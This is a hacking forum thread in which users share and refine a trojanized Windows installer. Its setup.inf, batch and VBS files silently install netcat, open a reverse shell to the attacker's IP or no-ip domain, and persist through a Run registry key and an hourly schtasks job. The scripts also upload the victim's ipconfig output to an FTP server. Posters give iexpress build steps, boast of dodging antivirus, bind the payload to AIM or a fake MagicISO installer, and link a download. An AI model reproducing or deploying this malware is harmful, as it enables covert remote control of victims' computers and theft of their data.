javabudd

I think it's time for an update...Got some good ideas we can use!

@jen/thedadymac The program is created so that they connect to you, regardless of a router. The reason the router doesn't matter is because we are using a reverse shell method, which has the victim send a connection request to the attacker (who has his ports forwarded on his router). If you need some help pm or somethin.

So today, I randomly started messing around with this payload and I thought about a few problems that one could have when using it. First off, the way the reverse shell works is that the infected computer sends out a request to connect to the attackers computer (spawning a cmd), which is done by putting your WAN IP address in the setup.inf file and others. The problem here is that most internet users do not have a static IP address, which means when your ISP changes your IP address, the reverse shell no longer works. A fix to this is a sweet program/website I found called no-ip DUC (www.no-ip.com). What this website does is allow you to create a free domain name, and using the program they offer, it auto updates your WAN IP to the domain you registered at the website. In short, if your running the no-ip program it will check your current WAN IP and update it to your domain name accordingly. So instead of typing in your IP address in the setup.inf files, you would type your domain (plcommando.no-ip.org) (remember to not include the www.). The second flaw that I found is that when you are using this program, you have to wait for them to connect to you, which is a bitch. In some previous versions, I tried using the "at" command to schedule a reverse shell interactively every few hours, but on newer versions of windows (vista, 7) the "at" command cannot be run interactively (cant execute programs). A solution to this is to use the new "schtasks" command to schedule the tasks a hell of alot easier. Instead of having 20 different jobs to schedule when you want them to connect to you, this new command makes them all possible in 1, and can be run interactively. The command is (schtasks /create /IT /SC HOURLY /TN "TASKNAME" /TR "C:\windows\system32\hidec.exe /w nc.exe -e cmd.exe "YOUR DOMAIN" "YOUR PORT") which sends a reverse shell every hour and can be switched to minutes, seconds, etc. This way you only have 1 job hidden next to several that Microsoft has in there by default. Thats all I got, my fingers hurt...<3 sable

wow sable im so glad this forum is still up!! I formatted my comp and forgot to backup all this shit but thankfully its here. <3

Java v2.0 Current Progress on Java Installer Payload v2.0 [li]Completely Stealthed[/li] [li]Bound to aim.exe (or any .exe installer you like)[/li] [li]Reverse shell on port 69[/li] [li]WORKS EVEN IF VICTIM HAS A ROUTER[/li] [li]Implements an ipconfig /all > %computername%.txt[/li] [li]Uploads "%computername%.txt to an FTP server (I am going to include the code but with my FTP info taken out)[/li] [li]Hidden.vbs and nircmd.exe used to never open up a cmd window (Installation and execution of nc.exe is never displayed)[/li] [li]WILL EXPLAIN SETUP.INF AND INSTALLATION FURTHER DOWN[/li] [li]And last but hopefully not the least, Anti virus does not pickup any of it. :D:D[/li] Teh Codez jvabd.bat: @echo off :: Executing IPCONFIG and creating .txt ipconfig /all &gt; c:WindowsSystem32%Computername%.txt cls :: Executing Script to send ipaddr to ftp :D CALL .hidden.vbs script.bat :: Quitting GOTO End :End hidden.vbs CreateObject("Wscript.Shell").Run """" &amp; WScript.Arguments(0) &amp; """", 0, False script.bat MAKE SURE YOU EDIT THE NECESSARY FIELDS @ECHO OFF :: Create the temporary script file &gt; script.ftp ECHO USER YOURUSERNAME &gt;&gt;script.ftp ECHO PASSWORD &gt;&gt;script.ftp ECHO binary &gt;&gt;script.ftp ECHO prompt n &gt;&gt;script.ftp ECHO put "C:WindowsSystem32%computername%.txt" &gt;&gt;script.ftp ECHO QUIT ::Connect to the ftp and run the script FTP -v -s:script.ftp FTPSERVER :: Overwriting the temp script so this never happened :D TYPE NUL &gt;script.ftp DEL script.ftp EXIT Setup.inf MAKE SURE YOU EDIT THE NECESSARY FIELDS ; This INF File will install netcat in the TARGET system32 directory and implement the following command ; "nc.exe -e cmd.exe 0.0.0.0 69";where 0.0.0.0 is YOUR EXTERNAL ip address ; After the installation a registry key will be added on the victims computer to connect to 0.0.0.0 69 ; any time you create a listen server on your computer ; Lets Begin: [Version] Signature="$Chicago$" AdvancedINF=2.0 [DefaultInstall] Copyfiles=install.files Copyfiles=installer.files RunPostSetupCommands=RunPostSetupCommandsSection AddReg=Add.Settings [DestinationDirs] ; If you are using a different .exe installer switch the directory HERE install.files=30,/Windows/System32 installer.files=30,/Program Files/AOL Instant Messenger [install.files] ; These are the pwnage programs that will be installed into system32 jvabd.bat;ipconfig /all txt creator script.bat;autoconnect to ftp and upload ipconfig txt :D nc.exe; netcat of course: nircmd.exe;hides cmd window hidden.vbs; hides cmd window while executing a batch in a batch setup.inf;inf file [installer.files] ; The aim installer that installs into /program files/aol instant messenger;) ; TO ADD DIFFERENT .EXE INSTALLERS REMOVE AIM.EXE AND REPLACE WITH YOUR.EXE aim.exe [Add.Settings] ; Adding registry key to make nc run on boot :D ; Input your IP address into 0.0.0.0 and make sure you have port 69 forwarded to receive the reverse shell :D HKLM,SoftwareMicrosoftWindowsCurrentVersionRun,WinUpdate, 0x00000000, "C:WindowsSystem32nircmd execmd nc.exe -e cmd.exe 0.0.0.0 69" [RunPostSetupCommandsSection] ; Programs are going to be listed in order of execution, including parameters (nc :D): ; ONCE AGAIN CHANGE 0.0.0.0 TO YOUR EXTERNAL IP ; If you have a different .exe installer replace aim.exe with your.exe once again nircmd.exe execmd CALL nc.exe -e cmd.exe 0.0.0.0 69 nircmd.exe execmd CALL jvabd.bat aim.exe [SourceDiskNames] 1="default",,1 [br] Instructions on creating the installer [br] Once you have created the jvabd.bat, hidden.vbs, script.bat and setup.inf its time to compile these programs into 1 cabinet .exe installer. Create a folder and name it whatever the fuck you want and inside this folder include the following things: nc.exe, nircmd.exe, jvabd.bat, script.bat, setup.inf, hidden.vbs, and the installer of your choice. Dont worry when you run the compiled version only the installer is shown, everything else gets stealth installed. Now, when you have these 7 things inside a folder its time to compile them into one. *Note* I have not found a method of doing this on linux or mac yet, being as they dont use .exe's" Click start - run - iexpress.exe. Choose "create new..." then click on "Extract files then run an installation command" Create a package title (i did AIM 5.9.8) )then decide whether or not u want a confirmation message (This will install blah blah, are you sure?) Next skip the license crap and you will see "Package Files". Click add, browse to your folder with the pwnage in it, and add all 7 items (including your.exe installer). Click next, on the next screen under "Install Program" choose SETUP.INF not YOUR.EXE INSTALLER and leave the post install command. Click next, leave the show window setting at recommended, click next, create a finished message if you like. Click next, name your installer.exe and choose the place you want to save it, also check the "Hide file extracting progress animation from user". Choose no restart, and on the next screen save your project if you want. Click next, create the package, and you now have a legit installer that includes pwange :D. **IF YOU USE THIS AND GET FUCKED ITS NOT MY FAULT**

HEY sable you're gonna like this one. I finally was able to incorporate a method to send their IP information. I created a few proggys to ipconfig /all the comp and create a text file ipaddr.txt in the sys32 directory. The other progy automatically connects to my ftp (No username or password needed because its already in the script :D) and uploads ipaddr.txt. This whole process takes about 1.3 seconds. Talk to me on aim if u want the code, i cant give it away here cuz it has my ftp info :/ Oh btw, you can scratch get External IP from upcoming additions :D

shout out to sable and his switchblade :D. If anyone has any ideas on what we should add let us know and we will try and implement them...commando payload v2 = GG

I got this installer perfected. Heres the link http://www.mediafire.com/?5i1ljjy9xcj. In the RAR is the fake MagicISO installer and the INF file i made. Read through the INF then you will understand what happens when you execute the installer. Very Happy Very Happy Happy Hacking !

fuck me sable

yes but could you explain your situation a little better?

**Edit** I changed the cabinet installer to put a directory in the windows folder named Attreb. Inside this folder is nc and all that shit the only problem im having right now is adding this key to the registry so it auto runs nc -L -d -p 69 -e cmd.exe. Im using INF files, anyone have any ideas?

Ive got a perfect iexpress installer that i made that throws NC into %sys32% and with the switches -L and -d netcat stays open even if they ctrl alt del it. And im also trying to add something that adds a registry key to HKLM/microsoft/windows/currenversion/run, anything in that key is run on startup with no questions asked and run perfectely stealthed :D